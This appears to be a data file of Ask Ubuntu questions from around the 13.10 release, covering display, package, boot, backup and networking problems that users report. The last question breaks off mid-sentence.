364227	after upgrade 13.10 edge between screens is solid , not sticky	i just upgrade to ubuntu 13.10 from 13.04 . i 'm using the open source drivers . i have an old 1600 x 1200 crt screen and 1280 x 1024 lcd screen attached . this used to work without problems on 13.04 . i am using a radeon hd 4870 videocard . both screen are connected through dvi - > vga converter . now after the upgrade i can not move the pointer , or any window i 'm holding between the screen . it is no longer a sticky edge , but a solid border . i have to `` go around '' this border by moving the pointer all the way to the top of the screen , and push . then i get to the other screen . another thing i noticed is that the launcher doesnt appear when i move the pointer to the left of either screen . i have to use the windows-key to use the launcher . anyone any idea why ?
364232	pdf reader problems	i 've got a pdf document that i would like to be able to read ... but for some reason a number of the embedded pictures and graphs do n't display cleanly when opened in evince or okular on ubuntu 13.04 ( they display normally in adobe acrobat reader on windows 7 ) . i 've tried downloading and installing adobe acrobat reader 9.5 and foxit reader 1.1 in .deb format and get warnings about bad packaging format , etc . even when i click thru to install anyway , the install process would hang up over and over again . are there any other viable options out there ? just for reference , here is a download link for the offending file if anyone cares to test it on their machine ( warning - 67+mb file ) : epri power system dynamics tutorial
364235	ca n't change xubuntu 13.04 background	i 've just installed xubuntu 13.04 and when i start xfdesktop-settings i ca n't add nor change background ( note i have 2 screen ) i have also tried `` set as background '' option in the right click menu , but nothing happened . can someone explain me where is the problem ?
364243	layout changed when i do n't have any other keyboard layout	i have just one keyboard layout and that is english ( dvorak ) but pressing alt+leftshift still changed the keyboard layout to qwerty ! how can i solve this problem ? ( in ubuntu 13.10 )
364244	gnome terminal loads slowly	my problem story is this : after restarting many times pc , because of memory problem and replacing with new memory when ubuntu stop booting with this error : '' initramfs '' to fix this problem i used ubuntu live cd and in terminal i ran these command : sudo e2fsck /dev/sda4 sda4 is my ubuntu system partition , and i unmount that drive and restart ; now ubuntu is ok now but i feel ubuntu works slowly ! specially when i want to open `` gnome terminal '' it loads slowly ! it takes almost 1 minute to load ! to check more , when i tried to login in ctrl+alt+f1 i saw many errors about hard disk sectors ! i could n't attach image because of less than 10 reputation here . i do n't want to reinstall ubuntu ! please help me how to fix this errors , i use gnome terminal many times .
364248	backing up with dd	i follow the instruction in this post , using the command dd if=/dev/sda1 | gzip > disk.img.gz but the imaging does not seem to stop . is it because the disk.img is being put ( as default ) in my home folder , which is on the same /dev/sda1 partition that i am imaging ? ( the size of /dev/sda1 is 24gb , but the img file is 32 gb and counting ) device boot start end blocks id system /dev/sda1 * 2048 484491263 242244608 83 linux /dev/sda2 484493310 488396799 1951745 5 extended /dev/sda5 484493312 488396799 1951744 82 linux swap / solaris if so , given my partition scheme , to solution is to cd to an external hard drive then use the above command ? edit : added the output of lsblk name maj : min rm size ro type mountpoint sda 8:0 0 232.9g 0 disk ├─sda1 8:1 0 231g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 1.9g 0 part [ swap ]
364254	what does ubuntu base do ?	in ubuntu 13.10 , almost every alternate day , i get an update for ubuntu-base . what does ubuntu-base mean ? what packages does it change ? is it safe to skip those updates ? this is the ubuntu base i have been talking about .
364256	creating volume group on root partition	i am currently doing some virtualisation lab works in which i need to run virtual machines on xen hypervisor . i need to create logical volumes on volume groups . i can create a new volume group using the command '' vgcreate vgpool /dev/sda1 '' while executing this , i am getting error saying that the partition is already mounted . however `` /sda1 '' being my root partition , i can not unmount it . i can create volume groups on partitions other than the root partition . my questions are 1 ) is there a way , i can add my root partition to a volume group ? 2 ) if not , how can i create logical volumes inside the root partitions , using commands like below ? ( i can not do this now since i dont know what should i substitute in place of the volumegroupname ) '' lvcreate -l 3g -n logicalvolumename volumegroupname ''
364257	how to check data usage on ubuntu 12.4	are there any tools to check data usage of usb datacard on linux ? any applications are there ? . how can i monitor data usage in ubuntu 12.4 ? ntm . data usage monitor applications were not working in my ubuntu 12.4
364258	how exclude folders for remove when using ( rm -rf * ) on the parent dir	i run the following command line to remove all files/dirs in directory : cd /home/abdennour/android/ rm -rf * the architecture of this directory is as following : /home/abdennour/android/ /home/abdennour/android/documents/ /home/abdennour/android/documents/medialib/ /home/abdennour/android/documents/preview/ /home/abdennour/android/fixtures/ /home/abdennour/android/images/ /home/abdennour/android/images/hard/ /home/abdennour/android/images/mlibrary/ /home/abdennour/android/images/mlibrary/thumbs/ /home/abdennour/android/js/ ... .. i want to remove all with excluding the following directories : /home/abdennour/android/documents/ /home/abdennour/android/images/mlibrary/
364260	how does the drop-down calendar in the panel work ? new event button does not do anything	i just found out that in 13.10 there 's an `` add event '' button in the calendar that drops down from the panel . yet i could n't figure out how to make it work ? for me clicking it does nothing . does it integrate with google calendar or lightning at all ? what do i have to do to make it work ? or is this button just there to make it look functional ? i appreciate any help . thanks ! : )
364261	help , broken gsettings	i was trying to disable the global menu as per http : //ubuntuhandbook.org/index.php/2013/07/disable-global-menu-on-ubuntu-13-10-saucy/ # comment-8612 , but while it did n't change anything , after running the autoremove command unity-tweak-tool broke . obviously my first reaction was to re-install the removed package but it remains broken . tbh i do n't know if it is even related or just a coincidence . when i start it from the launcher it just blinks and disappear . when i start it from terminal i get this error : $ gnome-tweak-tool warning : shell not installed or running warning : error detecting shell traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell_extensions.py '' , line 199 , in __init__ raise exception ( `` shell not running or dbus service not available '' ) exception : shell not running or dbus service not available info : gsettings missing key org.gnome.nautilus.desktop ( key computer-icon-visible ) warning : shell not running none info : gsettings missing key org.gnome.mutter ( key workspaces-only-on-primary ) segmentation fault ( core dumped ) i had a look with dconf-editor if i could just add the missing key , but apparently keys are n't meant to be added `` by hand '' . so how can i fix this ? i 'd rather prefer not having to reinstall everything . which package is broken , can i just reinstall that ? edit : i found by being root gnome-tweak-tool no longer crashed so possibly a permission issue somewhere . i do n't know that i changed any permissions . another related problem , actually the reason i noticed the problem at all , is that unity-tweak-tool seem no longer to want to save the values edited . i normally just have the unity launcher on the primary display but wanted to check what it was like having it on both . i did n't like it so i went into unity-tweak-tool to set it back - but regardless how many time i tick `` only primary display '' it never changes anything . what does the unity-tweak-tool actually change and can i do this directly somehow ?
364265	several keys on my asus desktop keyboard are not working in ubuntu 12.04	after installing ubuntu 12.04 on my asus g10ac , several keys on my keyboard ( asus g01 kb ) are not working at all . this includes both ctrl keys , both alt keys , and both windows keys . when i use the keyboard layout utility i can see that pressing the ctrl and alt keys correspond to using the left shift key , whereas none of the windows keys gives any sort of response ( no key is highlighted ) . i would like to know how to activate the proper function to these keys .
364267	ubuntu worldtime desktop clock widget ?	i am aware that in unity we can add world time by clicking on time bar . however , it 's still a list of locations and sometimes it may be hard to quickly find the timezone of interest . is there any tool which can put a multiple clock instances on the desktop representing each timezone of interest ? similar to the clock in windows 7 . to be more clear , i am not looking for a weather widget , but a simple clock widget so that i can track time in different timezones .
364269	how to install `` intel graphics driver installer `` in ubuntu 12.04 lts ?	my system specification is as follow : - microprocessor 2.6 ghz intel core i5-3230m video graphics intel hd graphics 4000 i want to install graphic driver provided by intel for linux . need help regarding installation of drivers . thanks .
364270	mount unknown filesystem exfat	error mounting /dev/sda6 at /media/gkp/backup : command-line `mount -t `` exfat '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sda6 '' `` /media/gkp/backup '' ' exited with non-zero exit status 32 : mount : unknown filesystem type 'exfat'
364271	apt-get update stuck at 100 % [ waiting for headers ] at `` hit http : //security.ubuntu.com precise-security/universe translation-en ''	not sure what has happened to my ubuntu 13.04 server . it is pretty much a lamp & samba server only , no other apps installed , no shell , command line only . i run an apt-get update a fortnight ago and it all worked fine . today i notice another set of updates available so i try again , and i keep getting stuck at : hit http : //security.ubuntu.com precise-security/universe translation-en 100 % [ waiting for headers ] every time it stops there . letting it go for a while it eventually gives the message err http : //au.archive.ubuntu.com precise-updates release.gpg connection failed i tried solutions from the following article ( and the links in it ) but i have not fixed the issue : apt-get update very slow , stuck at âwaiting for headersâ i live in australia and my internet speed test is showing 500kbps right now . any suggestions are really welcome . thanks in advance !
364274	unable to connect to remote ubuntu machine from windows	i am working on ubuntu 13.04 in my office and wanted to connect to this machine from my personal laptop which uses windows 7 . i 've installed nx server , nx node and nx client in ubuntu and trying to connect from nx client from the windows machine . i am able to connect but could not see any icons or my ubuntu home/desktop . just a black screen is displayed with no icons in it . i am unable to open any application or even access the terminal . any help on this would be really helpful.. thanks in advance , prakash .
364279	how to get unity app lens to show history ?	i am using ubuntu 12.04.03 64bit , all updates . my unity app lens suddenly does n't show my history of apps used when i open it . it always worked fine , and all of a sudden from today it does n't show history of previous apps used any more . the file lens is fine and still shows my history . what causes this and how can i fix it please . thank you
364280	how can i get a user account back ?	with all my computers i make one partition for the root and another for /home . this is useful for disasters where i need to reformat the root for ubuntu , but leave my /home data untouched . with the upgrade to 13.10 i had troubles on my wife 's computer so i reinstalled 13.10 . my own /home files came up , as expected , as if nothing had happened . for my wife , it is a different story - and that is the part where i need help . if i go into files , computer i can see the home directory . there i can see ilan ( my files ) and yona ( my wife 's files ) . i can open yona , documents and see all her work . this means that all is well and i just need to hook up to her files . so the problem is that i need to create a user called yona or yona , but something which will get me to exactly the files of interest . i 'm not sure if i created her account as standard or an administrator . is there any way i could tell by looking at the files in /home ? i created a new user called yona as a standard user ( hoping that this is the right guess ) . the account came up as disabled . i pressed on the disabled button so i could change the password . i put in her password but it was refused as too short . too short , too short , but that is what was used and that is what i need . can anyone help me before my wife comes home and shoots me ? thanks , ilan
364281	cross compilation of udns for power pc	i have libraries of x86 architecture that i want to cross compile for power pc . i have already cross compiled different libraries for power pc by setting environment variables for powerpc and using appropriate options with ./configure . now , i want to cross compile libudns for powerpc . in ./configure -- help i am not getting those appropriate options to cross compile . for libudns , i set environment variables for powerpc and ran ./configure but it throws following error : configure : fatal : $ cc ( powerpc-linux-gnu-gcc ) is not a working compiler
364283	killing a plesk 11.5 backup process in ubuntu	i want to kill a backup process initiated by plesk in ubuntu but do n't know which processes safely can be killed : ps aux | grep backup root 20505 0.0 0.0 4392 604 ? ss 01:43 0:00 /bin/sh -c [ -x /opt/psa/admin/sbin/backupmng ] & & /opt/psa/admin/sbin/backupmng > /dev/null 2 > & 1 psaadm 20510 0.0 0.0 30884 1816 ? s 01:43 0:00 /opt/psa/admin/sbin/backupmng psaadm 20511 0.0 0.0 30884 644 ? s 01:43 0:01 /opt/psa/admin/sbin/backupmng psaadm 20512 0.0 0.6 270472 49356 ? s 01:43 0:03 /usr/bin/sw-engine -c /opt/psa/admin/conf/php.ini /opt/psa/admin/plib/backup/scheduled_backup.php -- dump 1 root 20517 0.0 14.9 1400124 1214696 ? sn 01:43 0:27 /usr/bin/perl /opt/psa/admin/bin/plesk_agent_manager server -- owner-uid=0bd9576c-f832-4362-b4f4-3c1afac22be2 -- owner-type=server -- dump-rotation=7 -- backup-profile-name=serverxl_ -- session-path=/opt/psa/pmm/sessions/2013-10-23-014303.864 -- output-file=ftp : //ftp @ xxx.xxx.xxx.xxx//backup/serverxl/ -- ftp-passive-mode root 27423 0.0 0.0 13652 888 pts/2 s+ 10:35 0:00 grep -- color=auto backup root 29103 1.0 14.8 1400124 1209760 ? sn 02:16 5:21 /usr/bin/perl /opt/psa/admin/bin/plesk_agent_manager server -- owner-uid=0bd9576c-f832-4362-b4f4-3c1afac22be2 -- owner-type=server -- dump-rotation=7 -- backup-profile-name=serverxl_ -- session-path=/opt/psa/pmm/sessions/2013-10-23-014303.864 -- output-file=ftp : //ftp @ xxx.xxx.xxx.xxx//backup/serverxl/ -- ftp-passive-mode root 29106 0.0 14.8 1400404 1212456 ? dn 02:16 0:07 /usr/bin/perl /opt/psa/admin/bin/plesk_agent_manager server -- owner-uid=0bd9576c-f832-4362-b4f4-3c1afac22be2 -- owner-type=server -- dump-rotation=7 -- backup-profile-name=serverxl_ -- session-path=/opt/psa/pmm/sessions/2013-10-23-014303.864 -- output-file=ftp : //ftp @ xxx.xxx.xxx.xxx//backup/serverxl/ -- ftp-passive-mode it seems the ftp process is the culprit ?
364285	can not boot ubuntu 13.10 with my usb , can i change the kernal on my laptop to run it ?	currently i am running 12.04 and looking for an upgrade to 13.10 i first tried a bootable 64bit usb and failed . with the message saying kernel requires an x86-64 cpu but only detected an i686 cpu unable to boot please use a kernal appropriate for your cpu then tried 32bit and same message came up . is this due to my laptop simply being to slow ? or can/should i change the kernal somehow ? acer aspire 5710z intel pentium dual core processor , 1.73ghz , 533 mhz fsb , 1 mb l2 cache . 2gb ddr2 sudo lshw -c video [ sudo ] password for annette : *-display:0 description : vga compatible controller product : mobile 945gm/gms , 943/940gml express integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : d0300000-d037ffff ioport:5088 ( size=8 ) memory : c0000000-cfffffff memory : d0400000-d043ffff *-display:1 unclaimed description : display controller product : mobile 945gm/gms/gme , 943/940gml express integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : d0380000-d03fffff lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 04:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) 05:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 06:00.0 flash memory : ene technology inc ene pci memory stick card reader controller 06:00.1 sd host controller : ene technology inc ene pci smartmedia / xd card reader controller 06:00.2 flash memory : ene technology inc memory stick card reader controller 06:00.3 flash memory : ene technology inc ene pci secure digital / mmc card reader controller
364287	ubuntu 13.10 installed and worked , but now not working	i have a hp g7000 laptop . i updated/upgraded from 13.04 to 13.10 , after the software updater recommended i upgrade . i have duel booting system with windows vista . the system was working for the past two days , but i start getting the errors below , after selecting ubuntu in grub menu on startup and at the splash screen it says `` press s to skip or m for manual configuration '' pressing s gives a black screen and m takes you the errors below . windows boots and works fine after selection in the grub menu . [ 15.235703 ] ext3-fs ( sda5 ) : error : unrecognized mount option `` discard '' or missing value . [ 16.788072 ] [ drm : intel_pipe_config_compare ] *error* mismatch in adjusted_mode flags [ expected 2 , found 0 ] [ 20.860071 ] [ drm : intel_pipe_config_compare ] *error* mismatch in adjusted_mode flags [ expected 2 , found 0 ] [ 20.980076 ] [ drm : intel_pipe_config_compare ] *error* mismatch in adjusted_mode flags [ expected 2 , found 0 ] root filesystem check failed root @ simamhar : ~ # tried boot-repair using the livecd method , no luck . system still gives above error . ( you can view the boot-repair log here http : //paste.ubuntu.com/6287287 ) when i use the livecd for 13.04 or 13.10 however , my hard disk is recognized and i can read the files . why is it that the installation on the hard disk has stopped working and does not recognize my / ? what do the above errors mean and how can i solve them ? there was no power failure before , during or after the update/upgrade process from 13.04 to 13.10 . i now would like to go back to 13.04 without reinstalling afresh ? any help will be appreciated . thanks .
364288	optical s/pdif activate rear output	i 'm trying to use the optical audio output of my motherboard to send the sound to my av receiver . i only see the front channels received by my av . indeed rear channels do n't seem to be activated . how can i activate the rear channels ?
364289	intel graphics ubuntu 12.04.3 lts : does not detect second monitor	i have some problems to get the second monitor working on my ubuntu 12.04.3 lts . if i click on the detect button it does not work . info about my system : $ uname -a linux labtop2 3.8.0-32-generic # 47~precise1-ubuntu smp wed oct 2 16:22:28 utc 2013 i686 i686 i386 gnu/linux $ cat /etc/*-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.3 lts '' name= '' ubuntu '' version= '' 12.04.3 lts , precise pangolin '' id=ubuntu id_like=debian pretty_name= '' ubuntu precise ( 12.04.3 lts ) '' version_id= '' 12.04 '' $ lspci |grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) $ lsmod | grep video uvcvideo 72250 0 videobuf2_core 39385 1 uvcvideo videodev 96131 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12920 1 uvcvideo videobuf2_memops 13042 1 videobuf2_vmalloc video 19116 1 i915 $ xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 1366 x 768 , current 1368 x 768 , maximum 1368 x 768 default connected 1368x768+0+0 0mm x 0mm 1366x768 0.0 1368x768 0.0* before upgrading the system , xrand -q showed my much more resolution options and the other monitor . i have tried to install intel-linux-graphics-installer but this version of ubuntu is not supported any help will be apreciated ! !
364292	dead keys in emacs with ibus	i 've just upgraded to 13.10 and noticed that dead keys are not working anymore in emacs ( a keystroke to ' leads emacs to display < dead-acute > is undefined instead of waiting to the next key . in addition , use of the compose key leads to < multi_key > is undefined and it is impossible to use keybindings such as < m-^ > . other applications work fine as far as i can tell . a brief search on the internet suggested to ( require 'iso-transl ) to .emacs . this solves the first issue , but not the other ones . another possible workaround seen on the web is to launch emacs with an empty xmodifiers variable , as xmodifiers= '' emacs , instead of xmodifiers= @ im=ibus which seems to be the default in 13.10 . then everything works fine , but it looks like a kludge . is there a way to make emacs work with ibus on this subject ? update : i observe the same behavior in 14.04 . update : content of .dmrc as asked for in comments : [ desktop ] session=xubuntu language=fr_fr layout=us intl langlist=fr_fr : en lcmess=fr_fr.utf-8
364295	how to apply patch to existing installation in ubuntu	how to apply patch to existing installed 'msp430-gdb ' in ubuntu ? or how to apply patch while installing msp430-gdb ? i guess its not necessarily to be msp430-gdb .
364296	apt-get packages held back	well i ran a update and an upgrade today and then apt-get spurts out this output on performing a upgrade ( also applies to dist-upgrade ) : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages have been kept back : moka-icon-theme 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . an apt-get -f install reveals nothing , just that 1 package not upgraded . manually trying to install moka-icon-theme : the following packages have unmet dependencies : moka-icon-theme : depends : moka-icon-theme-symbolic but it is not installable e : unable to correct problems , you have held broken packages . trying to install moka-icon-theme-symbolic : package moka-icon-theme-symbolic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'moka-icon-theme-symbolic ' has no installation candidate does this mean that it 's a problem with my ubuntu installation or do i have to give a knock to the developer ? edit : it was fixed today . i contacted the maintainer and it 's all fixed now . thanks !
364297	problem with grub2 | unknown filesystem , grub rescue >	my english is bad , but i think we can understand . i have dual boot with ubuntu 11.10 and windows 7 . i ca n't mount partition in live mode . i lost grub2 on start , and i get a message : error : unkown filesystem grubrescue > i try this commands , but for all `` msdos '' i get this message : error : unkown filesystem see picture http : //fotkica.com/imgs3/1_62840295_photo2420.jpg i was try set boot= ( hd0 , msdos3 ) /boot/grub , but error same again error : unkown filesystem when i try in live mode to return grub2 , i write this sudo fdisk -l , and no read command . i know my linux in instaled on sda3 partition , and i write this command sudo mount /dev/sda1 /mnt and i get this answer mount : /dev/sda3 : ca n't read superblock and that 's answer is same for all sda1/sda2/sda3/sda4/sda5 what to do ? please help me , i wa n't to recover my data best regards , and thanks !
364299	vmware error in ubuntu 12.10	i have been running a windows server 2008 r2 vm for quite some time in my ubuntu machine . the vm resides on an external hard-disk to overcome size constraints . i tried connecting my vm to a host machine running windows 7 . but i got an error stating unable to read vmx file as it has been created using other version of vmware . now i am trying to reconnect my hard-drive to run the vm on ubuntu and i get the error `` unable to change virtual machine power state : read beyond end of object '' . is it so that there is some problem in the hard-disk ? ! i tried reconnecting the hard-disk and rebooting host ubuntu machine . there are other vms which are running fine ! : ( anybody faced this issue ? ! any cues to fix it ? !
364300	how can i get a folder get synced when ubuntu one says it is `` not valid '' ?	i 'm trying to get a folder get synced but u1 refuses to sync it . the folder is inside my home directory . i using ubuntu 12.04 as os . in the applicatoin , the erorr message is : the chosen directory `` /home/foxdog/studies '' is not valid . please choose a folder inside your `` /home/foxdog '' directory , and not overlapping with any existing cloud folder . the problem might well be my problematic past : - ) 1 ) the folder had another name initially ( /home/foxdog/tse ) and was synced alright 2 ) then i renamed it to current /home/foxdog/studies , created a sub-folder directory `` phd/ '' and had that synced . i think it synced fine . 3 ) now i 'm coming and wanting the whole /studies folder have synced . and it does n't work . obvious idea is the `` overlap '' as explanation . but how to get rid of it ? so it unchecked the phd folder , ( the tse folder was unchecked already ) , and it still does n't work . still the same erorr message ( see above ) above invalidity and overlap . any ideas ? reboot ? : - ) delete the folder in the cloud ? is n't there cleaner and safer way ?
364302	samsung galaxy tab 3 : it opens with a media player	i just wan na ask how to open the default folder again of my samsung galaxy tab 3 . this is what happened : first , i connected the usb plug . the tab says : `` connected as a media device '' , but it opens with rythmbox . i want to open it on the exact folder like `` playlists '' `` pictures '' `` videos '' , but when i plug the usb , the rythmbox quickly appears . how do i do it again ? i 'm not really familiar with ubuntu because i got used on windows .
364306	how to fix a second screen	this is not a generic question but rather a specific one for my system . i just freshly installed ubuntu 12.04 and did all the updates . one of the updates told me to install additional hardware ( for my nvidea geforce 610m graphics card ) , which gave me 2 options : the recommended one , or the post-release one . i picked recommended . however the second screen wasnt working properly ( monitor gets a signal , but nothing appears on it ) and i get the error : failed to apply configuration : % s gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr after googling this error i found various tips which whould solve the issue and i dont really know what i 've done so far : ( ( i did mess around with arandr and xrandr ) problem is : tabs is my firefox now appear horribly oldschool looking and basicly i want to get that back and get my second screen to work . can anyone help ? my laptop is an asus a55vd .
364310	eclipse kepler runs weird	i just downloaded and try to run eclipse kepler on ubuntu 13.10 . if i run eclipse with command ./eclipse eclipse runs , but very weird : ( nut if i run with the command sudo ./eclipse everything runs fine . but i do n't want to sudo . please help me .
364313	installing network manger on ubuntu	i have deleted accedently the network manager from ubuntu 13.04 on my hp pavilion 13.04 . now i am not able to connect to the internet using my laptop . i have downloaded the two .deb packages of network manager . 1 : network-manager-dbg_0.9.8.0-0ubuntu6_amd64.deb 2 : network-manager-gnome_0.9.8.0-1ubuntu2_amd64.deb i have followed the instructions from the following site . network manager deleted but when i unpack the network-manager-gnome from the terminal , it says : dpkg : dependency problems prevent configuration of network manager-gnome : network-manger-gnome depends on network-manager ( > = 0.9.8 ) ; package network-manager is not installed . dpkg : error processing network-manager-gnome ( -- install ) : dependency problems - leaving unconfigured i also tried to install the network-manager package by double clicking on it , but the software center says : new software cant be installed , there is a problem eith the software currently installed . do you want to repair this problem now ? but there is no network access to do the repair . what to do now ? ? ? ?
364317	ubuntu boot from usb	we have selected to try ubuntu before installing option & we are trying to gain access to a riad 5 pack of 4 disks , which originated from a seagate black armour nas device that seems to be running a simple version of busybox . now instead of us booting into ubuntu main system we keep booting into busybox . how do we change this
364318	intel centrino 7260 after kernel update	after every kernel update , will i need to redo everything from the answer here ? the reason i ask is because last night the kernel update but the wifi no longer works unless i load the previous kernel . will this be a perpetual problem with updating ?
364319	why ca n't i refresh the list of packages ?	this might be a duplicate , but i ca n't find a solution in other posts . whenever i try to update i get this message : error # # # error # # # error # # # error # # # error # # # error # # # error e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/listspackages.medibuntu.org_dists_quantal_free_i18n_translation-en , e : the package lists or status file could not be parsed or opened . i have tried runnig this in the terminal : sudo rm /var/lib/apt/lists/* -vf sudo apt-get update it does n't work at all . i cant even open the software sources and `` sudo apt-get check '' gives me this message : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/packages.medibuntu.org_dists_quantal_free_i18n_translation-en e : the package lists or status file could not be parsed or opened . update : solution for me was to remove the medibuntu-keyring through synaptic manager and removed mediubuntu from the software sources too manually . this seems to have solved the problem . the update manager doesnt give me any error messages anymore .
364320	cyrus-imapd no connection	i am trying to connect to cyrus-imapd via imap starttsl . i have setup auxprop with sasldb auth all i get is wrong username or passwort and logs tell me : oct 23 12:59:44 mailserver cyrus/master [ 17153 ] : about to exec /usr/lib/cyrus/bin/imapd oct 23 12:59:44 mailserver cyrus/imap [ 17153 ] : executed oct 23 12:59:44 mailserver cyrus/imap [ 17153 ] : accepted connection oct 23 12:59:44 mailserver cyrus/master [ 17154 ] : about to exec /usr/lib/cyrus/bin/imapd oct 23 12:59:44 mailserver cyrus/imap [ 17154 ] : executed oct 23 12:59:44 mailserver cyrus/imap [ 17154 ] : accepted connection and nothing happens can someone help me with this ? if you need config files just tell me which one ...
364322	i 'm having trouble installing ubuntu	i bought a laptop yesterday and it came with windows 8 , i tried it , but i did not like it at all . so i 've tried installing ubuntu with a live usb and it did not work . the versions i 've tried so far are : 12.04.03 x64 , 12.10 x64 , 13.10 x64 . i 've tried booting with usb as i mentioned above , none worked so i tried with a livedisc which turned out to not work either . i 've tried disable secureboot which got me somewhat further , but this message came : `` stopping cpu interrupts balancing daemon '' and the screen turned white and nothing more happened . after that i disabled the uefi and quiet boot , wich got me even further until i met commandlines only . programs used : linux live usb creator , universal usb installer . i also tried winmd5sum to check if the iso . files i downloaded were intact , and they were . i have one idea left , which is to use a windows disc or usb and format the drive completely , but not sure if that would work . i want ubuntu as a stand alone os , and not dual booting by the way . any ideas on how to fix it ? edit : new message appeared , `` root is n't set '' and it turns to white .
364324	unable to run java , icedtea on ubuntu 12.04 lts in chrome or firefox	i have updated to 12.04 lts from 10.04 lts because i could not get java to test as working on http : //www.java.com/en/download/installed.jsp ... i still ca n't get java working . i have installed icedtea and the openjdk through the software center . i have run 'apt-get update ; apt-get upgrade ' . i have tried chrome and firefox . i have read all over the internet and this problem keeps coming up . for example : icedtea-7-plugin non-functional in ubuntu 13.04 i have followed the instructions there and elsewhere and java still fails to validate and run for me and , apparently , a lot of people . i am out of ideas and java still does not validate and run for me . any help would most definitely be appreciated .
364325	ubuntu 13.10 : issues with edimax ew-7722und usb wireless adapter	since upgrading to ubuntu 13.10 , wireless with the usb adaptor listed in subject has been inconsistent . when i boot-up the system works fine , however after 20mins using it , internet connectivity simply stops . if i disconnect the usb wi-fi adaptor and re-connect ; internet returns for some time and than it stops again . note that ubuntu never disconnects from my wi-fi and when i check the signal its always full even when internet is not working . i hook the system up with an ethernet cable and internet works fine . i do n't have any issues with other wireless devices ( laptops , consoles and smartphones ) in my home and this only started since the upgrade . i believe this occurred because of the updated kernel ubuntu 13.10 uses . previously i was using ubuntu 12.04 lts but i upgraded since it never recognized my video card driver . since upgrading to 13.10 the video driver issues has been solved but now this wi-fi issue appeared . while thanking you all in advance for your contribution , you 're earliest help is really appreciated .
364326	how to recover from bad upgrade to 13.04 ( unity very slow )	oh boy . i have two computers . on one , i upgraded from 12.04 to 12.10 , attempting to go to 13.04 with catastrophic results , requiring me basically to install brand new 13.04 onto machine and this worked just fine . this was okay since i had a backup and did n't use this computer that much . ( i 'm on it now ) . now , on my main computer , i used sudo do-release-upgrade to go from 12.04 to 12.10 . this worked well , i guess , but it was n't my main destination and i did n't stay long . everything seemed fine , so i inserted the dvd ( 13.04 ) i had used on the other machine , chose upgrade existing system and went to bed . when i awoke , the first thing it told me was that `` some programs could not be installed . you will have to reinstall them after reboot . '' my first question is can a get a list of these , somehow ? after reboot , i find that everything is just dog slow . i type into the finder and each keystroke takes close to a second to appear in the edit box . mouse clicks take forever to process . my second question is i do have a backup , but short of a complete reinstall , is there anything that anyone might be able to suggest here ? my final question : is downgrade a possibility worth consideration ? update : i should clarify `` everything is dog slow '' . that is not quite true . once i managed to launch firefox ( it took a while to type `` firefox '' in the finder box and clicking icons takes forever ) , input within firefox , both mouse and keyboard is crisp and completely satisfactory . so it seems that the problem is mainly with the ubuntu gnome desktop and not the graphics card . also , even within the desktop `` tool tips '' appear quickly when the mouse moves over their area - it is only mouse clicks and keypresses on the desktop and task bar itself that are problematic . update2 : i 've also found that right-click actions on the launcher bar work well . it 's only left-clicks and keyboard actions within text boxes owned by the launcher bar , such as the finder , that are slow . in other words : left click on launcher button : wait forever right click on launcher and choose menu item that opens a window for app : ok also : typing alt-tab to switch between apps : dog slow again update3 : finally got around to trying ansidev 's answer below . i rebooted into recovery mode , enabled networking and did the recovery thing . it did not help . current status , the system is basically functional , except for unity . everything unity touches is slow . the uppermost button , you wait forever . any key typed into the edit box for unity search takes maybe 5 seconds to appear . alt-tab is ridiculously slow . right-clicking on unity buttons is better , for some reason . this is not the most recent system ever but it should be adequate . it 's a 6 year old dell inspiron 530 with 4gb of ram . i have a less 